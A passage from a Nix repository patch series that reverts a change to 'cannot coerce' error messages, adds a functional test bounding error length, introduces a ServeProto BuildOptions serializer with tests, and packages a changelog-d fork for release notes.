* - * Note: subclasses of `SourceAccessor` need to implement at least + * @note Like the other `readFile`, this method should *not* follow + * symlinks. + * + * @note subclasses of `SourceAccessor` need to implement at least * one of the `readFile()` variants. */ virtual void readFile( @@ -87,6 +97,9 @@ struct SourceAccessor typedef std::map DirEntries; + /** + * @note Like `readFile`, this method should *not* follow symlinks. + */ virtual DirEntries readDirectory(const CanonPath & path) = 0; virtual std::string readLink(const CanonPath & path) = 0; From 9b7b7a7561b24d48452627709e6872d9c610428b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 02:13:32 +0100 Subject: [PATCH 076/654] Revert "Print the value in `error: cannot coerce` messages (#9553)" This reverts commit f0ac2a35d5e9dfb3a53e6cc810e871fe119cbf4b. The request from the sibling PR, which also applies here, was not addressed. https://github.com/NixOS/nix/pull/9554#issuecomment-1845095735 --- .../rl-next/print-value-in-coercion-error.md | 50 ------------------- .../src/language/string-interpolation.md | 2 +- src/libexpr/eval.cc | 10 ++-- ...al-fail-bad-string-interpolation-1.err.exp | 2 +- ...al-fail-bad-string-interpolation-3.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 28 +++++------ 6 files changed, 21 insertions(+), 73 deletions(-) delete mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md deleted file mode 100644 index 504ea67b9..000000000 --- a/doc/manual/rl-next/print-value-in-coercion-error.md +++ /dev/null @@ -1,50 +0,0 @@ -synopsis: Coercion errors include the failing value -issues: #561 -prs: #9553 -description: { - -The `error: cannot coerce a to a string` message now includes the value which caused the error. 
- -Previously, a failed string coercion produced a confusing error message if the trace didn't show where the offending value was defined: - -```bash -$ nix-instantiate --eval --expr ' -let x = { a = 1; }; in - -"${x}" -' -error: - … while evaluating a path segment - - at «string»:4:2: - - 3| - 4| "${x}" - | ^ - 5| - - error: cannot coerce a set to a string -``` - -Now, the error message includes the value itself: - -```bash -$ nix-instantiate --eval --expr ' -let x = { a = 1; }; in - -"${x}" -' -error: - … while evaluating a path segment - - at «string»:4:2: - - 3| - 4| "${x}" - | ^ - 5| - - error: cannot coerce a set to a string: { a = 1; } -``` - -} diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index 6e28d2664..e999b287b 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -189,7 +189,7 @@ If neither is present, an error is thrown. > "${a}" > ``` > -> error: cannot coerce a set to a string: { } +> error: cannot coerce a set to a string > > at «string»:4:2: > diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index c04e2d53d..841c223cd 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -27,9 +27,9 @@ #include #include #include +#include #include #include -#include #include #include @@ -2230,7 +2230,7 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) + error("cannot coerce %1% to a string", showType(v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2276,7 +2276,7 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) + error("cannot coerce %1% to a string", showType(v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2635,10 +2635,8 @@ void EvalState::printStatistics() 
std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { - std::stringstream printed; - print(printed); throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), printed.str()) + .msg = hintfmt("cannot coerce %1% to a string", showType()) }); } diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index e54ecc6d1..eb73e9a52 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string: + error: cannot coerce a function to a string diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index 6f0a96f78..ac14f329b 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string: + error: cannot coerce a function to a string diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index c2403bee9..81498f65a 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a Boolean", "true"), + hintfmt("cannot coerce %s to a 
string", "a Boolean"), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string", "a list"), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = 1; }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1057,7 +1057,7 @@ namespace nix { ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), 
+ hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1143,7 +1143,7 @@ namespace nix { ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string: %s", "an integer", "1"), + hintfmt("cannot coerce %s to a string", "an integer"), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1229,12 +1229,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", @@ -1279,17 +1279,17 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - hintfmt("cannot 
coerce %s to a string: %s", "a set", "{ }"), + hintfmt("cannot coerce %s to a string", "a set"), hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } From b9980b377ede0aca542b2baeeef9e4538dec20db Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 02:36:33 +0100 Subject: [PATCH 077/654] Update rl-next/source-positions-in-errors for Nix 2.19+ --- doc/manual/rl-next/source-positions-in-errors.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md index 00f0b27e8..15df884ea 100644 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -21,8 +21,6 @@ it: error: … while evaluating an attribute name - at «none»:0: (source not available) - error: value is a set while a string was expected ``` From 6e8d5983143ae576e3f4b1d2954a5267f2943a49 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 02:17:36 +0100 Subject: [PATCH 078/654] tests/lang/eval-fail-bad-string-interpolation-4: init --- .../lang/eval-fail-bad-string-interpolation-4.err.exp | 11 +++++++++++ .../lang/eval-fail-bad-string-interpolation-4.nix | 9 +++++++++ 2 files changed, 20 insertions(+) create mode 100644 tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp create mode 100644 tests/functional/lang/eval-fail-bad-string-interpolation-4.nix diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp new file mode 100644 index 000000000..07843a480 --- /dev/null +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -0,0 +1,11 @@ +error: + … while evaluating a path segment + + at /pwd/lang/eval-fail-bad-string-interpolation-4.nix:9:3: + + 8| # The error message should not be too long. 
+ 9| ''${pkgs}'' + | ^ + 10| + + error: cannot coerce a set to a string diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.nix b/tests/functional/lang/eval-fail-bad-string-interpolation-4.nix new file mode 100644 index 000000000..457b5f06a --- /dev/null +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.nix @@ -0,0 +1,9 @@ +let + # Basically a "billion laughs" attack, but toned down to simulated `pkgs`. + ha = x: y: { a = x y; b = x y; c = x y; d = x y; e = x y; f = x y; g = x y; h = x y; j = x y; }; + has = ha (ha (ha (ha (x: x)))) "ha"; + # A large structure that has already been evaluated. + pkgs = builtins.deepSeq has has; +in +# The error message should not be too long. +''${pkgs}'' From 5417990e313272a5f1129ac39228b111e8dac857 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 14:32:22 -0500 Subject: [PATCH 079/654] Create `ServeProto::BuildOptions` and a serializer for it More tests, and more serializers for Hydra reuse. --- src/libstore/legacy-ssh-store.cc | 22 +++----- src/libstore/serve-protocol.cc | 36 +++++++++++++ src/libstore/serve-protocol.hh | 25 +++++++++ src/nix-store/nix-store.cc | 34 ++++++++----- .../data/serve-protocol/build-options-2.1.bin | Bin 0 -> 16 bytes .../data/serve-protocol/build-options-2.2.bin | Bin 0 -> 24 bytes .../data/serve-protocol/build-options-2.3.bin | Bin 0 -> 40 bytes .../data/serve-protocol/build-options-2.7.bin | Bin 0 -> 48 bytes tests/unit/libstore/serve-protocol.cc | 48 ++++++++++++++++++ 9 files changed, 137 insertions(+), 28 deletions(-) create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.1.bin create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.2.bin create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.3.bin create mode 100644 tests/unit/libstore/data/serve-protocol/build-options-2.7.bin diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 277445ee6..8ef2daa7b 
100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -275,20 +275,14 @@ private: void putBuildSettings(Connection & conn) { - conn.to - << settings.maxSilentTime - << settings.buildTimeout; - if (GET_PROTOCOL_MINOR(conn.remoteVersion) >= 2) - conn.to - << settings.maxLogSize; - if (GET_PROTOCOL_MINOR(conn.remoteVersion) >= 3) - conn.to - << 0 // buildRepeat hasn't worked for ages anyway - << 0; - - if (GET_PROTOCOL_MINOR(conn.remoteVersion) >= 7) { - conn.to << ((int) settings.keepFailed); - } + ServeProto::write(*this, conn, ServeProto::BuildOptions { + .maxSilentTime = settings.maxSilentTime, + .buildTimeout = settings.buildTimeout, + .maxLogSize = settings.maxLogSize, + .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway + .enforceDeterminism = 0, + .keepFailed = settings.keepFailed, + }); } public: diff --git a/src/libstore/serve-protocol.cc b/src/libstore/serve-protocol.cc index c37b3095c..08bfad9e4 100644 --- a/src/libstore/serve-protocol.cc +++ b/src/libstore/serve-protocol.cc @@ -98,4 +98,40 @@ void ServeProto::Serialise::write(const StoreDirConfig & s << info.sigs; } + +ServeProto::BuildOptions ServeProto::Serialise::read(const StoreDirConfig & store, ReadConn conn) +{ + BuildOptions options; + options.maxSilentTime = readInt(conn.from); + options.buildTimeout = readInt(conn.from); + if (GET_PROTOCOL_MINOR(conn.version) >= 2) + options.maxLogSize = readNum(conn.from); + if (GET_PROTOCOL_MINOR(conn.version) >= 3) { + options.nrRepeats = readInt(conn.from); + options.enforceDeterminism = readInt(conn.from); + } + if (GET_PROTOCOL_MINOR(conn.version) >= 7) { + options.keepFailed = (bool) readInt(conn.from); + } + return options; +} + +void ServeProto::Serialise::write(const StoreDirConfig & store, WriteConn conn, const ServeProto::BuildOptions & options) +{ + conn.to + << options.maxSilentTime + << options.buildTimeout; + if (GET_PROTOCOL_MINOR(conn.version) >= 2) + conn.to + << options.maxLogSize; + if 
(GET_PROTOCOL_MINOR(conn.version) >= 3) + conn.to + << options.nrRepeats + << options.enforceDeterminism; + + if (GET_PROTOCOL_MINOR(conn.version) >= 7) { + conn.to << ((int) options.keepFailed); + } +} + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index ada67a149..1665b935f 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -87,6 +87,13 @@ struct ServeProto { ServeProto::Serialise::write(store, conn, t); } + + /** + * Options for building shared between + * `ServeProto::Command::BuildPaths` and + * `ServeProto::Command::BuildDerivation`. + */ + struct BuildOptions; }; enum struct ServeProto::Command : uint64_t @@ -102,6 +109,22 @@ enum struct ServeProto::Command : uint64_t AddToStoreNar = 9, }; + +struct ServeProto::BuildOptions { + /** + * Default value in this and every other field is so tests pass when + * testing older deserialisers which do not set all the fields. + */ + time_t maxSilentTime = -1; + time_t buildTimeout = -1; + size_t maxLogSize = -1; + size_t nrRepeats = -1; + bool enforceDeterminism = -1; + bool keepFailed = -1; + + bool operator == (const ServeProto::BuildOptions &) const = default; +}; + /** * Convenience for sending operation codes. 
* @@ -144,6 +167,8 @@ template<> DECLARE_SERVE_SERIALISER(BuildResult); template<> DECLARE_SERVE_SERIALISER(UnkeyedValidPathInfo); +template<> +DECLARE_SERVE_SERIALISER(ServeProto::BuildOptions); template DECLARE_SERVE_SERIALISER(std::vector); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 45af7879c..d361dc0ac 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -835,27 +835,33 @@ static void opServe(Strings opFlags, Strings opArgs) verbosity = lvlError; settings.keepLog = false; settings.useSubstitutes = false; - settings.maxSilentTime = readInt(in); - settings.buildTimeout = readInt(in); + + auto options = ServeProto::Serialise::read(*store, rconn); + + // Only certain fields get initialized based on the protocol + // version. This is why not all the code below is unconditional. + // See how the serialization logic in + // `ServeProto::Serialise` matches + // these conditions. settings.maxSilentTime = options.maxSilentTime; settings.buildTimeout = options.buildTimeout; if (GET_PROTOCOL_MINOR(clientVersion) >= 2) - settings.maxLogSize = readNum(in); + settings.maxLogSize = options.maxLogSize; if (GET_PROTOCOL_MINOR(clientVersion) >= 3) { - auto nrRepeats = readInt(in); - if (nrRepeats != 0) { + if (options.nrRepeats != 0) { throw Error("client requested repeating builds, but this is not currently implemented"); } - // Ignore 'enforceDeterminism'. It used to be true by - // default, but also only never had any effect when - // `nrRepeats == 0`. We have already asserted that - // `nrRepeats` in fact is 0, so we can safely ignore this - // without doing something other than what the client - // asked for. - readInt(in); - + // Ignore 'options.enforceDeterminism'. + // + // It used to be true by default, but also only never had + // any effect when `nrRepeats == 0`. 
We have already + // checked that `nrRepeats` in fact is 0, so we can safely + // ignore this without doing something other than what the + // client asked for. settings.runDiffHook = true; } if (GET_PROTOCOL_MINOR(clientVersion) >= 7) { - settings.keepFailed = (bool) readInt(in); + settings.keepFailed = options.keepFailed; } }; diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.1.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.1.bin new file mode 100644 index 0000000000000000000000000000000000000000..61e1d97286139e43918505b1b953128360d27853 GIT binary patch literal 16 NcmZQ&fB-fq4FCX;01N;C literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.2.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.2.bin new file mode 100644 index 0000000000000000000000000000000000000000..045c2ff2b54ba708bc1d411f0e8786207c4e660a GIT binary patch literal 24 PcmZQ&fB-fq%?_mj0Vn_y literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.3.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.3.bin new file mode 100644 index 0000000000000000000000000000000000000000..5c53458831dca70d5303363919f46f20f88993a2 GIT binary patch literal 40 VcmZQ&fB-fq%?_nGpfn?t1^@!!02}}S literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/data/serve-protocol/build-options-2.7.bin b/tests/unit/libstore/data/serve-protocol/build-options-2.7.bin new file mode 100644 index 0000000000000000000000000000000000000000..1bc7b02db38f5f751c2610de84ff937e630567c9 GIT binary patch literal 48 WcmZQ&fB-fq%?_nGpfrqPgfajFxBwgg literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index c2298c6db..8f256d1e6 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -302,6 +302,54 @@ VERSIONED_CHARACTERIZATION_TEST( }), })) +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_1, + 
"build-options-2.1", + 2 << 8 | 1, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_2, + "build-options-2.2", + 2 << 8 | 2, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + .maxLogSize = 7, + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_3, + "build-options-2.3", + 2 << 8 | 3, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + .maxLogSize = 7, + .nrRepeats = 8, + .enforceDeterminism = true, + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + build_options_2_7, + "build-options-2.7", + 2 << 8 | 7, + (ServeProto::BuildOptions { + .maxSilentTime = 5, + .buildTimeout = 6, + .maxLogSize = 7, + .nrRepeats = 8, + .enforceDeterminism = false, + .keepFailed = true, + })) + VERSIONED_CHARACTERIZATION_TEST( ServeProtoTest, vector, From 360f3b3a9e0a74eb8b7d5a1744ad58f4cd487ca0 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 19:50:33 +0100 Subject: [PATCH 080/654] changelog-d: Use roberth fork with markdown frontmatter support --- flake.nix | 2 +- misc/changelog-d.cabal.nix | 31 +++++++++++++++++++++++++++++++ misc/changelog-d.nix | 31 +++++++++++++++++++++++++++++++ 3 files changed, 63 insertions(+), 1 deletion(-) create mode 100644 misc/changelog-d.cabal.nix create mode 100644 misc/changelog-d.nix diff --git a/flake.nix b/flake.nix index dbd45f053..90203e7d5 100644 --- a/flake.nix +++ b/flake.nix @@ -182,7 +182,7 @@ "--enable-internal-api-docs" ]; - changelog-d = pkgs.buildPackages.changelog-d; + changelog-d = pkgs.buildPackages.callPackage ./misc/changelog-d.nix { }; nativeBuildDeps = [ diff --git a/misc/changelog-d.cabal.nix b/misc/changelog-d.cabal.nix new file mode 100644 index 000000000..76f9353cd --- /dev/null +++ b/misc/changelog-d.cabal.nix @@ -0,0 +1,31 @@ +{ mkDerivation, aeson, base, bytestring, cabal-install-parsers +, Cabal-syntax, containers, directory, 
filepath, frontmatter +, generic-lens-lite, lib, mtl, optparse-applicative, parsec, pretty +, regex-applicative, text, pkgs +}: +let rev = "f30f6969e9cd8b56242309639d58acea21c99d06"; +in +mkDerivation { + pname = "changelog-d"; + version = "0.1"; + src = pkgs.fetchurl { + name = "changelog-d-${rev}.tar.gz"; + url = "https://codeberg.org/roberth/changelog-d/archive/${rev}.tar.gz"; + hash = "sha256-8a2+i5u7YoszAgd5OIEW0eYUcP8yfhtoOIhLJkylYJ4="; + } // { inherit rev; }; + isLibrary = false; + isExecutable = true; + libraryHaskellDepends = [ + aeson base bytestring cabal-install-parsers Cabal-syntax containers + directory filepath frontmatter generic-lens-lite mtl parsec pretty + regex-applicative text + ]; + executableHaskellDepends = [ + base bytestring Cabal-syntax directory filepath + optparse-applicative + ]; + doHaddock = false; + description = "Concatenate changelog entries into a single one"; + license = lib.licenses.gpl3Plus; + mainProgram = "changelog-d"; +} diff --git a/misc/changelog-d.nix b/misc/changelog-d.nix new file mode 100644 index 000000000..1b20f4596 --- /dev/null +++ b/misc/changelog-d.nix @@ -0,0 +1,31 @@ +# Taken temporarily from +{ + callPackage, + lib, + haskell, + haskellPackages, +}: + +let + hsPkg = haskellPackages.callPackage ./changelog-d.cabal.nix { }; + + addCompletions = haskellPackages.generateOptparseApplicativeCompletions ["changelog-d"]; + + haskellModifications = + lib.flip lib.pipe [ + addCompletions + haskell.lib.justStaticExecutables + ]; + + mkDerivationOverrides = finalAttrs: oldAttrs: { + + version = oldAttrs.version + "-git-${lib.strings.substring 0 7 oldAttrs.src.rev}"; + + meta = oldAttrs.meta // { + homepage = "https://codeberg.org/roberth/changelog-d"; + maintainers = [ lib.maintainers.roberth ]; + }; + + }; +in + (haskellModifications hsPkg).overrideAttrs mkDerivationOverrides From 3811b334c646bc3b4bf8caef6d13c9f5027246f1 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 19:51:20 +0100 Subject: [PATCH 
081/654] rl-next: Use markdown frontmatter syntax The old syntax is still supported, as long as you don't use a { in the description - the reason to migrate. --- doc/manual/rl-next/hash-format-nix32.md | 5 +++-- doc/manual/rl-next/mounted-ssh-store.md | 9 ++++----- doc/manual/rl-next/nix-config-show.md | 11 +++++------ doc/manual/rl-next/nix-env-json-drv-path.md | 9 +++------ doc/manual/rl-next/nix-hash-convert.md | 6 +++--- doc/manual/rl-next/source-positions-in-errors.md | 9 ++++----- doc/manual/src/contributing/hacking.md | 9 ++++----- 7 files changed, 26 insertions(+), 32 deletions(-) diff --git a/doc/manual/rl-next/hash-format-nix32.md b/doc/manual/rl-next/hash-format-nix32.md index 20c557da9..73e6fbb24 100644 --- a/doc/manual/rl-next/hash-format-nix32.md +++ b/doc/manual/rl-next/hash-format-nix32.md @@ -1,6 +1,7 @@ +--- synopsis: Rename hash format `base32` to `nix32` -prs: #9452 -description: { +prs: 9452 +--- Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for [Base32](https://en.wikipedia.org/wiki/Base32). diff --git a/doc/manual/rl-next/mounted-ssh-store.md b/doc/manual/rl-next/mounted-ssh-store.md index 39fac5283..6df44dbb6 100644 --- a/doc/manual/rl-next/mounted-ssh-store.md +++ b/doc/manual/rl-next/mounted-ssh-store.md @@ -1,9 +1,8 @@ +--- synopsis: Mounted SSH Store -issues: #7890 -prs: #7912 -description: { +issues: 7890 +prs: 7912 +--- Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. 
- -} diff --git a/doc/manual/rl-next/nix-config-show.md b/doc/manual/rl-next/nix-config-show.md index b2ad3c666..26b961b76 100644 --- a/doc/manual/rl-next/nix-config-show.md +++ b/doc/manual/rl-next/nix-config-show.md @@ -1,8 +1,7 @@ -synopsis: `nix config show` -issues: #7672 -prs: #9477 -description: { +--- +synopsis: Rename to `nix config show` +issues: 7672 +prs: 9477 +--- `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. - -} diff --git a/doc/manual/rl-next/nix-env-json-drv-path.md b/doc/manual/rl-next/nix-env-json-drv-path.md index fbe2b67d8..734cefd1b 100644 --- a/doc/manual/rl-next/nix-env-json-drv-path.md +++ b/doc/manual/rl-next/nix-env-json-drv-path.md @@ -1,9 +1,6 @@ +--- synopsis: Fix `nix-env --query --drv-path --json` -prs: #9257 -description: { +prs: 9257 +--- Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. - -} - - diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md index de4367c5b..2b718a66b 100644 --- a/doc/manual/rl-next/nix-hash-convert.md +++ b/doc/manual/rl-next/nix-hash-convert.md @@ -1,6 +1,7 @@ +--- synopsis: Add `nix hash convert` -prs: #9452 -description: { +prs: 9452 +--- New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track to stabilization! Examples: @@ -44,4 +45,3 @@ The following commands are still available but will emit a deprecation warning. - `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` or even just `nix hash convert $hash1 $hash2` instead. 
-} diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md index 15df884ea..5b210289d 100644 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -1,7 +1,8 @@ +--- synopsis: Source locations are printed more consistently in errors -issues: #561 -prs: #9555 -description: { +issues: 561 +prs: 9555 +--- Source location information is now included in error messages more consistently. Given this code: @@ -39,5 +40,3 @@ error: error: value is a set while a string was expected ``` - -} diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9de5ad39b..237eff925 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -257,17 +257,16 @@ User-visible changes should come with a release note. Here's what a complete entry looks like. The file name is not incorporated in the document. ``` +--- synopsis: Basically a title -issues: #1234 -prs: #1238 -description: { +issues: 1234 +prs: 1238 +--- Here's one or more paragraphs that describe the change. - It's markdown - Add references to the manual using @docroot@ - -} ``` Significant changes should add the following header, which moves them to the top. 
From a856f603ed5a124f7eb818dadab6c88da73570fb Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 19:55:47 +0100 Subject: [PATCH 082/654] Add checks.rl-next --- flake.nix | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/flake.nix b/flake.nix index 90203e7d5..f499b0a9b 100644 --- a/flake.nix +++ b/flake.nix @@ -691,6 +691,11 @@ perlBindings = self.hydraJobs.perlBindings.${system}; installTests = self.hydraJobs.installTests.${system}; nixpkgsLibTests = self.hydraJobs.tests.nixpkgsLibTests.${system}; + rl-next = + let pkgs = nixpkgsFor.${system}.native; + in pkgs.buildPackages.runCommand "test-rl-next-release-notes" { } '' + LANG=C.UTF-8 ${(commonDeps { inherit pkgs; }).changelog-d}/bin/changelog-d ${./doc/manual/rl-next} >$out + ''; } // (lib.optionalAttrs (builtins.elem system linux64BitSystems)) { dockerImage = self.hydraJobs.dockerImage.${system}; }); From a63be6578f7e17182fdec8e3d3fdbab19a814152 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 9 Dec 2023 21:22:20 +0100 Subject: [PATCH 083/654] flake.nix: Cache shell inputs through hydra --- flake.nix | 2 ++ 1 file changed, 2 insertions(+) diff --git a/flake.nix b/flake.nix index f499b0a9b..99480183a 100644 --- a/flake.nix +++ b/flake.nix @@ -540,6 